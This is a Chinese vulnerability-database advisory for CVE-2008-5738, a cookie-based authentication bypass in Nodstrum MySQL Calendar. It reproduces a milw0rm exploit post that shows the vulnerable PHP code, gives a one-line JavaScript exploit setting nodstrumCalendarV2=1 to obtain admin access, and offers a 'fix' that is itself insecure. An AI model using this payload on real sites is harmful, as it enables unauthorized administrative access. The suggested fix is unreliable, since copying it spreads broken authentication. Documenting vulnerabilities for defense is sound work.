MySQL Calendar Cookie 权限绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117084 漏洞类型 权限许可和访问控制
发布时间 2008-12-18 更新时间 2008-12-31
CVE编号 CVE-2008-5738 CNNVD-ID CNNVD-200812-462
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7513
https://www.securityfocus.com/bid/32914
https://cxsecurity.com/issue/WLB-2008120199
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-462
|漏洞详情
MySQLCalendar是一款基于MySQL和OverLIB的事件日历软件。NodstrumMySQLCalendar1.1版本以及1.2版本允许远程攻击者通过把nodstrumCalendarV2cookie设置成1,以绕过权限并获得管理访问权。
|漏洞EXP
[START]

#########################################################################################
[0x01] Informations:

Script         : Calendar Script v1.1
Download       : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
Vulnerability  : Insecure Cookie Handling
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX


#########################################################################################
[0x02] Bug: [Insecure Cookie Handling]
######

Bugged file is: /[path]/index.php

[CODE]

if(mysql_num_rows($checkDetails) > 0) {
    setcookie('nodstrumCalendarV2', '1', time()+3600);	// Cookie will expire in 1 hour.
    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}

[/CODE]

If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and
'1' as content.

## [!] FIX: Change name or content to the cookie. Example:

[CODE]

if(mysql_num_rows($checkDetails) > 0) {
    setcookie('nodstrumCalendarV2', '$password', time()+3600);	// Cookie will expire in 1 hour.
    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
}

[/CODE]


### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/";


#########################################################################################

[/END]

# milw0rm.com [2008-12-18]
|受影响的产品
Nodstrum MySQL Calendar 1.1
|参考资料

来源:BID
名称:32914
链接:http://www.securityfocus.com/bid/32914
来源:MILW0RM
名称:7513
链接:http://www.milw0rm.com/exploits/7513
来源:SREASON
名称:4816
链接:http://securityreason.com/securityalert/4816
来源:SECUNIA
名称:33214
链接:http://secunia.com/advisories/33214
来源:OSVDB
名称:50827
链接:http://osvdb.org/50827